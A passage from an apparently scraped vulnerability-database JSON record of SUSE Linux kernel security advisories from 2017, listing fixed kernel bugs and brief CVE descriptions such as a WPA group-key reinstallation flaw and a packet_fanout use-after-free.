This reverts commit\n 54e17b011580b532415d2aee5e875c8cf0460df4.\n - Revert "x86/acpi: Enable MADT APIs to return disabled apicids"\n (bnc#1056230).\n - Revert "x86/acpi: Set persistent cpuid <-> nodeid mapping when\n booting" (bnc#1056230).\n - Revert "xfs: detect and handle invalid iclog size set by mkfs\n (bsc#1043598)." This reverts commit\n caf0b124b172568b3e39544cb9abfdaa7fb3d852.\n - Revert "xfs: detect and trim torn writes during log recovery\n (bsc#1036215)." This reverts commit\n a7a591776e8628a33f0223ca9a3f46c1e79bd908.\n - Revert "xfs: refactor and open code log record crc check (bsc#1036215)."\n This reverts commit 6aef5e1fee21246222618f2337c84d6093281561.\n - Revert "xfs: refactor log record start detection into a new helper\n (bsc#1036215)." This reverts commit\n a424c875bdc05dcf3bb0d1af740b644773091cf0.\n - Revert "xfs: return start block of first bad log record during recovery\n (bsc#1036215)." This reverts commit\n cb0ce8b2f1435d7ac9aaeb5d5709e73946d55bed.\n - Revert "xfs: support a crc verification only log record pass\n (bsc#1036215)." 
This reverts commit\n f5c0c41b1f3626750f1f0d76b6d71fac673854d2.\n - Rewrote KVM kABI fix patches for addressing regressions (bsc#1063570)\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060249, LTC#159112).\n - s390/diag: add diag26c support (bnc#1053472, LTC#156729).\n - s390: export symbols for crash-kmp (bsc#1053915).\n - s390: Include uapi/linux/if_ether.h instead of linux/if_ether.h\n (bsc#1053472).\n - s390/pci: do not cleanup in arch_setup_msi_irqs (bnc#1053472,\n LTC#157731).\n - s390/pci: fix handling of PEC 306 (bnc#1053472, LTC#157731).\n - s390/pci: improve error handling during fmb (de)registration\n (bnc#1053472, LTC#157731).\n - s390/pci: improve error handling during interrupt deregistration\n (bnc#1053472, LTC#157731).\n - s390/pci: improve pci hotplug (bnc#1053472, LTC#157731).\n - s390/pci: improve unreg_ioat error handling (bnc#1053472, LTC#157731).\n - s390/pci: introduce clp_get_state (bnc#1053472, LTC#157731).\n - s390/pci: provide more debug information (bnc#1053472, LTC#157731).\n - s390/pci: recognize name clashes with uids (bnc#1053472, LTC#157731).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1060249, LTC#159885).\n - s390/qeth: no ETH header for outbound AF_IUCV (bnc#1053472, LTC#156276).\n - s390/qeth: size calculation outbound buffers (bnc#1053472, LTC#156276).\n - s390/qeth: use diag26c to get MAC address on L2 (bnc#1053472,\n LTC#156729).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060249, LTC#159177).\n - s390/topology: always use s390 specific sched_domain_topology_level\n (bnc#1060249, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060249,\n LTC#159177).\n - sched/cpuset/pm: Fix cpuset vs. 
suspend-resume bugs (bnc#1012382).\n - scsi: csiostor: add check for supported fw version (bsc#1005776).\n - scsi: csiostor: add support for Chelsio T6 adapters (bsc#1005776).\n - scsi: csiostor: fix use after free in csio_hw_use_fwconfig()\n (bsc#1005776).\n - scsi: csiostor: switch to pci_alloc_irq_vectors (bsc#1005776).\n - scsi: csiostor: update module version (bsc#1052093).\n - scsi: cxgb4i: assign rxqs in round robin mode (bsc#1052094).\n - scsi: fixup kernel warning during rmmod() (bsc#1052360).\n - scsi: hisi_sas: add missing break in switch statement (bsc#1056849).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: lpfc: Ensure io aborts interlocked with the target (bsc#1056587).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: qedf: Fix a potential NULL pointer dereference (bsc#1048912).\n - scsi: qedf: Limit number of CQs (bsc#1040813).\n - scsi: qedi: off by one in qedi_get_cmd_from_tid() (bsc#1004527,\n FATE#321744).\n - scsi: qla2xxx: Fix uninitialized work element (bsc#1019675,FATE#321701).\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985). This patch\n is originally part of a larger series which can't be easily backported\n to SLE-12. 
For a reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi_transport_fc: Also check for NOTPRESENT in fc_remote_port_add()\n (bsc#1037890).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - SMB3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - SMB: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - staging: 
iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - supported.conf: enable dw_mmc-rockchip driver References: bsc#1064064\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n - sysctl: simplify unsigned int support (bsc#1048893).\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n 8e0ee3c9faed).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 27084efee0c3).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes aec04cbdf723).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n aec04cbdf723).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tty: 
pl011: fix initialization order of QDF2400 E44 (bsc#1054082).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - Update patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-check.patch\n (bsc#1036737).\n - Update\n patches.drivers/tpm-141-fix-RC-value-check-in-tpm2_seal_trusted.patch\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 5ca4c20cfd37).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: fix device node leak (bsc#1047487).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message 
error handling (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/acpi: Restore the order of CPU IDs (bnc#1056230).\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function (bsc#1060229).\n - x86/cpu/amd: Limit cpu_core_id fixup to families older than F17h\n (bsc#1060229).\n - x86/cpu: Remove unused and undefined __generic_processor_info()\n declaration (bnc#1056230).\n - x86 edac, sb_edac.c: Take account of channel hashing when needed\n (bsc#1061721).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/mm: Fix boot crash caused by incorrect loop count calculation in\n sync_global_pgds() (bsc#1058512).\n - x86/mm: Fix fault error path using unsafe vma pointer (fate#321300).\n - x86/mm: Fix use-after-free of ldt_struct (bsc#1055963).\n - x86/mshyperv: Remove excess #includes from mshyperv.h (fate#320485).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: nowait aio support (FATE#321994).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xgene: Always get clk source, but ignore if it's missing for SGMII ports\n (bsc#1048501).\n - xgene: Do not fail probe, if there is no clk resource for SGMII\n 
interfaces (bsc#1048501).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "edition": 1, "modified": "2017-10-25T15:17:56", "published": "2017-10-25T15:17:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00073.html", "id": "SUSE-SU-2017:2847-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T19:01:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-12153", "CVE-2017-6346"], "description": "The SUSE Linux Enterprise 12 SP2 Realtime kernel was updated to 4.4.95 to\n receive various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel. This function did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410 1058624).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: caiaq: Fix stray URB at probe error path (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: hda: Remove superfluous '-' added by printk conversion\n (bnc#1012382).\n - alsa: line6: Fix leftover URB at error-path during probe (bnc#1012382).\n - alsa: seq: Enable 'use' locking in all configurations (bnc#1012382).\n - alsa: seq: Fix copy_from_user() call inside lock (bnc#1012382).\n - alsa: usb-audio: Add native DSD support for Pro-Ject Pre Box S2 Digital\n (bnc#1012382).\n - alsa: usb-audio: Check out-of-bounds access 
by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usb-audio: Kill stray URB at exiting (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: blacklisted 16af97dc5a89 (bnc#1053919)\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bpf: one perf event close won't free bpf program attached by another\n perf event (bnc#1012382).\n - bpf/verifier: reject BPF_ALU64|BPF_END (bnc#1012382).\n - brcmfmac: add length check in brcmf_cfg80211_escan_handler()\n (bnc#1012382).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - brcmsmac: make some local variables 'static const' to reduce stack size\n (bnc#1012382).\n - bridge: netlink: register netdevice before executing 
changelink\n (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: add a node counter to each of the rbtrees (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: add cond_resched() calls when resolving backrefs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: allow backref search checks for shared extents (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add tracepoints for prelim_ref insertion and merging\n (bsc#974590 bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add unode_aux_to_inode_list helper (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, cleanup __ namespace abuse (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: backref, constify some arguments (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: btrfs_check_shared should manage its own transaction (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: clean up extraneous computations in add_delayed_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: constify tracepoint arguments (bsc#974590 bsc#1030061 bsc#1022914\n bsc#1017461).\n - btrfs: convert prelimary reference tracking to use rbtrees (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix leak and use-after-free in resolve_indirect_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - btrfs: remove ref_tree implementation from backref.c (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: struct-funcs, constify readers (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n 
- bus: mbus: fix window size calculation for 4GB windows (bnc#1012382).\n - can: esd_usb2: Fix can_dlc value for received RTR, frames (bnc#1012382).\n - can: gs_usb: fix busy loop if no more TX context is available\n (bnc#1012382).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: clean up unsafe d_parent accesses in build_dentry_path\n (bnc#1012382).\n - cifs: fix circular locking dependency (bsc#1064701).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: Reconnect expired SMB sessions (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - clockevents/drivers/cs5535: Improve resilience to spurious interrupts\n (bnc#1012382).\n - cpufreq: CPPC: add ACPI_PROCESSOR dependency (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: shash - Fix zero-length shash ahash digest crash (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - crypto: xts - Add ECB dependency (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - direct-io: Prevent NULL pointer access in submit_page_section\n (bnc#1012382).\n - dmaengine: edma: Align the memcpy acnt array size with the transfer\n (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm/dp: Introduce MST topology state to 
track available link bandwidth\n (bsc#1055493).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - drm/nouveau/bsp/g92: disable by default (bnc#1012382).\n - drm/nouveau/mmu: flush tlbs before deleting page tables (bnc#1012382).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: in ext4_seek_{hole,data}, return -ENXIO for negative offsets\n (bnc#1012382).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - f2fs crypto: add missing locking for keyring_key access (bnc#1012382).\n - f2fs crypto: replace some BUG_ON()'s with error checks (bnc#1012382).\n - f2fs: do not wait for writeback in write_begin (bnc#1012382).\n - fix unbalanced page refcounting in bio_map_user_iov (bnc#1012382).\n - fix whitespace according to upstream commit\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs-cache: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypt: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypto: require write access to mount to set encryption policy\n (bnc#1012382).\n - fs/epoll: cache leftmost node (bsc#1056427).\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in 
gfs2_glock_iter_next (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hid: usbhid: fix out-of-bounds bug (bnc#1012382).\n - hpsa: correct lun data caching bitmap definition (bsc#1028971).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: at91: ensure state is restored after suspending (bnc#1012382).\n - i2c: ismt: Separate I2C block read from SMBus block read (bnc#1012382).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (bnc#1012382).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (bnc#1012382).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (bnc#1012382).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 
(bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: adc: xilinx: Fix error handling (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/amd: Finish TLB flush in amd_iommu_unmap() (bnc#1012382).\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ip6_gre: skb_push ipv6hdr before packing the header in ip6gre_header\n (bnc#1012382).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - irqchip/crossbar: Fix incorrect type of local variables (bnc#1012382).\n - isdn/i4l: fetch the ppp_write buffer in one shot (bnc#1012382).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - iwlwifi: mvm: use IWL_HCMD_NOCOPY for MCAST_FILTER_CMD (bnc#1012382).\n - ixgbe: Fix incorrect bitwise operations of PTP Rx timestamp flags\n (bsc#969474 FATE#319812 bsc#969475 FATE#319814).\n - kABI: protect struct l2tp_tunnel (kabi).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - keys: do not let add_key() update an uninstantiated key (bnc#1012382).\n - keys: encrypted: fix dereference of NULL user_key_payload 
(bnc#1012382).\n - keys: Fix race between updating and finding a negative key (bnc#1012382).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: nVMX: fix guest CR4 loading when emulating L2 to L1 exit\n (bnc#1012382).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - l2tp: Avoid schedule while atomic in exit_net (bnc#1012382).\n - l2tp: fix race condition in l2tp_tunnel_delete (bnc#1012382).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - lib/digsig: fix dereference of NULL user_key_payload (bnc#1012382).\n - locking/lockdep: Add nest_lock integrity test (bnc#1012382).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - mac80211: fix power saving clients handling in iwlwifi (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - mac80211_hwsim: check HWSIM_ATTR_RADIO_NAME length (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/linear: shutup lockdep warnning (bnc#1012382).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: 
